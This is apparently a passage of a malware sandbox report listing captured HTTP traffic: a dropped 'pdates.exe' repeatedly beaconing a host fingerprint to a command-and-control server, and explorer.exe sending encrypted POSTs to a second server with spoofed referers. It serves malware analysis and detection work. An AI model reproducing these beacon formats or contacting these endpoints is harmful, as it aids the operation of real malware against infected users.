Jul 27, 2023 01:33:57.357949972 CEST	3748	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:57.407676935 CEST	3748	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:57 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
193	192.168.2.5	49912	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:57.557790995 CEST	3749	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:57.606024981 CEST	3750	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:57 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
194	192.168.2.5	49914	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:57.768116951 CEST	3751	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:57.816776037 CEST	3751	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:57 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
195	192.168.2.5	49915	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:57.991780043 CEST	3751	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:58.040488958 CEST	3752	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:58 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
196	192.168.2.5	49916	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:58.200181007 CEST	3752	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:58.248454094 CEST	3753	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:58 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
197	192.168.2.5	49917	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:58.414953947 CEST	3753	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:58.464489937 CEST	3754	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:58 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
198	192.168.2.5	49918	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:58.620796919 CEST	3754	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:58.671257019 CEST	3755	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:58 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
199	192.168.2.5	49919	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:58.827035904 CEST	3756	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:58.876096964 CEST	3756	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:58 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.5	49718	77.91.68.29	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:32:59.116538048 CEST	102	OUT	POST /fks/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://owqnotnc.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 140 Host: 77.91.68.29
Jul 27, 2023 01:32:59.116631985 CEST	102	OUT	Data Raw: 14 6d 14 7d 43 65 17 82 ff 74 d1 57 05 d3 11 27 47 f5 86 50 b8 14 19 46 ea 98 34 d4 f5 de bb e7 e5 a8 44 c8 bf ff 64 d4 77 01 7d b1 74 f5 59 fb 08 ff e2 b6 02 7a b6 b5 08 2d 62 7f 1f e1 68 05 94 04 50 e7 2b af a2 d5 f3 c9 39 df 28 fc 8a 54 80 21 Data Ascii: m}CetW'GPF4Ddw}tYz-bhP+9(T!RUjyU5Q9f2S[6S.RC"8TC9d={
Jul 27, 2023 01:32:59.169712067 CEST	102	IN	HTTP/1.1 404 Not Found Date: Wed, 26 Jul 2023 23:32:59 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 7 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 Data Raw: 03 00 00 00 2d 20 59 Data Ascii: - Y
Jul 27, 2023 01:32:59.183950901 CEST	102	OUT	POST /fks/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://qsrgpskjgs.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 276 Host: 77.91.68.29
Jul 27, 2023 01:32:59.183950901 CEST	103	OUT	Data Raw: 14 6d 14 7d 43 65 17 82 ff 74 d1 57 05 d3 11 27 47 f5 86 50 b8 14 19 46 ea 98 34 d4 f5 de bb e7 e5 a8 44 c8 bf ff 64 d4 77 01 7d b1 74 f5 59 fb 08 ff e2 b6 02 7a b6 b5 08 2d 62 7f 1f e1 68 05 94 04 50 e7 28 af a2 d5 f3 c9 38 df 28 fc c3 48 be 76 Data Ascii: m}CetW'GPF4Ddw}tYz-bhP(8(Hv^Ht,"".)`GPvNgxv+>$*g0gFEUKoP3XzBce?r>`Q;{ [..{xDa@gv)@^'Cpz6q{pbrb{Q~)}BbK
Jul 27, 2023 01:32:59.233808994 CEST	103	IN	HTTP/1.1 404 Not Found Date: Wed, 26 Jul 2023 23:32:59 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 48 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 Data Raw: 00 00 87 48 0e 3e 83 15 b2 bb 39 c8 39 c3 24 4a 59 cd fb c7 0b fb 57 b6 e0 74 61 82 c9 45 a6 8d 33 9d a0 71 5e f0 0f ac 53 7d 9b 0f cc e8 60 b1 Data Ascii: H>99$JYWtaE3q^S}`

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
20	192.168.2.5	49736	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:07.352034092 CEST	2853	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:07.399960041 CEST	2853	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:07 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
200	192.168.2.5	49920	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:59.040071011 CEST	3757	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:59.087703943 CEST	3757	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:59 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
201	192.168.2.5	49921	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:59.249136925 CEST	3758	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:59.298934937 CEST	3758	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:59 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
202	192.168.2.5	49922	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:59.461668968 CEST	3759	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:59.511265039 CEST	3759	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:59 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
203	192.168.2.5	49923	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:59.674391031 CEST	3759	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:59.723855019 CEST	3760	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:59 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
204	192.168.2.5	49924	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:59.925554037 CEST	3760	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:59.974993944 CEST	3761	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:59 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
205	192.168.2.5	49925	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:00.159092903 CEST	3761	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:00.207176924 CEST	3762	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:00 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
206	192.168.2.5	49926	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:00.370678902 CEST	3762	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:00.419219017 CEST	3763	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:00 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
207	192.168.2.5	49927	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:00.589947939 CEST	3763	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:00.639086008 CEST	3764	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:00 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
208	192.168.2.5	49928	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:00.796833038 CEST	3764	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:00.845426083 CEST	3765	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:00 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
209	192.168.2.5	49929	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:00.995107889 CEST	3765	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:01.044929028 CEST	3766	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:01 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
21	192.168.2.5	49737	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:07.624593973 CEST	2854	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:07.674230099 CEST	2854	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:07 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
210	192.168.2.5	49930	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:01.211652040 CEST	3766	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:01.259974003 CEST	3767	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:01 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
211	192.168.2.5	49931	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
